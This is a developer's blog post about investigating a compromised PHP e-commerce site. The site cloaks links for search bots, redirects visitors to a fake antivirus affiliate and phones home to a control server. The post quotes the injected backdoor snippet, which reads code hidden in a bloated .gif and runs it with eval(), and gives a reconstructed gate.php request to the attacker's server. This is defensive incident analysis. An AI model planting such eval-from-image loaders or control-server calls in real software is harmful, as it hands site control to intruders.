So before I start this post I think I should make it clear that I am supporting my clients legacy code, which was developed by another developer at least 3-4 years ago. My client is aware of the issues with the code and is actively seeking to patch it up.

So anway, yesterday I got an email from my client at around 3pm showing some rather nasty Google search results with some of his domains listed in them. Naturally I clicked on the links to see what would happen, and sure enough, after being sent to my clients website, I was sent on to some kind of affiliate web page full of pop-ups trying to tell me my machine had a virus and that I should buy the anti-virus software they were selling – I’m sure you’ve all seen the kind of website I’m talking about.

So obviously this is a bit of an emergency, so I stopped what I was doing and started to investigate. I’m still not certain how the attack is being implemented since we’ve not yet managed to discover how the hacker is getting access to the server, hence this being probably the first post in a series, but I’ll tell you what I know.

About a month ago, my client phoned me up saying he had accidentally clicked on a virus in his email, and it had caused major problems on his PC. He told me he was running anti-virus software and cleaning up his machines. Knowing that my client doesn’t have the greatest computer skills I thought “uh oh” this could be bad.

Shortly after this, maybe a week later, my client phones up because one of his clients ecommerce websites (he runs a small web development firm) was redirecting visitors to a web page selling anti-virus software! (sound familiar?). So I took a look around the code and discovered that one of the product names in the database had been changed to include some JavaScript which redirected you immediately to this AV affiliate website.

My first thought was oh no, this means the website has been SQL injected, so I looked through the logs and sure enough there were some requests coming from a bot that was trying to SQL inject. Obviously I patched up the SQL injection vulnerability and nothing else of the issue.

Then, about 2 weeks later, I get another phone call; the websites doing the same thing. So now I know it can’t be SQL injection, which means the hacker either has root access to the server the website(s) are on (more than one has been affected to date), or that the hacker has FTP access, so I instruct my client to change all his FTP usernames and passwords, which he promptly does, and I fix the issues with the code.

Then about 2 weeks more pass by and I get an email entitled “Nightmare!!”, which is kind of where this story begins…

So, as I mentioned above, I visited the website in my browser – looks fine, I am able to browse the shop, I’m not redirected anywhere, but the email from my client has links to this website that definately redirect to the affiliate website in question. So I type the address into my browser including the full URL from my clients email, and sure enough I am redirected to this affiliate website.

The url looked like this:

http://www.clientsdomain.com/index.php?id=50000

So naturally I checked out index.php, and saw the following code:

<?
$browser = CheckBrowser();
$link = $browser ? ‘index.php?id=50000′ : ‘about-us.php’;
$title = $browser ? ‘Blog <font color=#FF0000>(NEW)</font>’ : ‘About us’;
?>
<td height=”26″ align=”center” class=”style51″><a href=”<? echo $link; ?>”><? echo $title; ?></a></td>

Roughly speaking, this code checks the browser, and either displays a link to about-us.php or links off the url above (index.php?id=50000).

Now, that’s interesting, so I needed to know what the php function CheckBrowser() was doing… so I had to hunt around the code (all Object Orientated Code without documentation) and I found the CheckBrowser() function – it was basically testing to see if the request was being made by GoogleBot, or Yahoo. So to test my theory I used the following great little tool ( http://www.web-tool.org/cloak-check/cloak-check.asp ) in conjunction with http://bethebot.com and yep, this website was definitely cloaking.

So then I had to figure out how it was redirecting, index.php didn’t have any code to check for $_GET variables, nor did it include any code to redirect people; strange…

So I took another good look around the code and found the following bit of PHP:

        if(isset($_REQUEST['id']))
        if(($_REQUEST['id']>=50000)&&($_REQUEST['id']<60000))
        {
            $fls = array(array('images/product-display-box_19.gif',3696,21894));
            foreach($fls as $v)
            if(file_exists($v[0]))
            {
                $f=fopen($v[0],'rb');fseek($f,$v[1],SEEK_SET);$d=fread($f,$v[2]);fclose($f);eval($d);megadupa($v[0]);
                break;
            }
            die();
        }

Amusingly, placed immediately preceding my code designed to prevent SQL injection.

Now look at this code, there is a $_GET variable called id, with a value between 50000 and 60000 it opens a file on the server product-display-box_19.gif and reads a specific part of that file and then evals()  whatever it finds (which means it “runs the code”). Now a .gif image shouldn’t be able to be executed, so how does this work? and, what the hell is the megadupa() function, that’s not part of the PHP language, why isn’t this falling over saying that that is bad php.

So the next port of call was to look at product-display-box_19.gif. I checked out the images/ folder on the server and guess what, there is a 19MB file with that very name, now 19MB is HUGE for an image file, so I though I need to see this.

I downloaded it from the server, and double clicked on it – I’m pretty good with PCs so although I knew I might suffer a buffer overlow attack or a trojan, but I’m confident I can handle these things

Well, I loaded up the image and it was a tiny little .gif, it looked like the bottom of a button and would normally be 19 KB  in size not 19 MB! Obviously there is something fishy going on here. So I opened the .gif file using Notepad++, took ages of course, but once it had loaded, I scanned through the code and sure enough this .gif file has been specially crafted and contains loads of PHP, XHTML / CSS the lot, in fact it’s a pretty amazing file.

So I renamed the file to .php and noticing that there were some comments in the embedded PHP instructing me how to run the code without the eval() function stuck it on my local server and voila it loaded! And it didn’t just load anything, it loaded what looked like clones of WordPress – two of them, loads of sex related keywords, basically this thing looked like it had been used repeatedly to hack servers. What a find.

So being curious I started to trawl through the code, and guess what, this script “phones home”, revealing IP addresses. So I followed them, and ended up on a webserver in the USA, with a message saying that “the service was unavailable”, so I referred back to the code, and noticed that when it “phones home” it also sends back information about the referrer, domain, IP address etc etc so I constructed a fake URL as follows

http://123.123.123.123/gate/gate.php?t=av&s=2&pid=665&uri=www.example.com%2Findex.php&ip=64.22.112.234&ref=&ua=Mozilla%2F5.0+%28compatible%3B+Googlebot%2F2.1%3B+%2Bhttp%3A%2F%2Fwww.google.com%2Fbot.html%29

And, I was in!

Suddenly this server in America sends me back a web address, you guessed it, for the affiliate website.

So now I’m looking at a server which instructs these scripts to point other peoples websites to a URL of the hackers choice! Of course at this stage I whois’ed the IP address and yes I know who is hosting the IP.

So next up, I do a reverse DNS lookup using http://www.myipneighbors.com/ and I find some of the other websites on the server in America. So I visited them, they pretty much all seemed to be spammy fake “search engines” but interestingly they linked back to another IP address – also in America, but on a different host server. So I loaded up the new IP address and was immediately redirected to domain. I’m not going to reveal the domain, but this gave me something else to run a whois check on.

So I did, and the domain resolved to someone in Texas, but even more interestingly, it included an email address for the registrant: @mail.ru

So now I’m looking at a Russian hacker, using a server in America to control what seems to be a number of compromised servers to redirect websites and manipulate search engine results to point to an affiliate website selling anti-virus software.

So, since I still don’t know how this person got into my clients website in the first place, I have instructed him to change his FTP passwords and not to log in again for the time being. I will be contacting the web hosting company and I’m waiting to see if the hacker gets back in again, if they do I can only presume the web host has been compromised.

Look out for part two…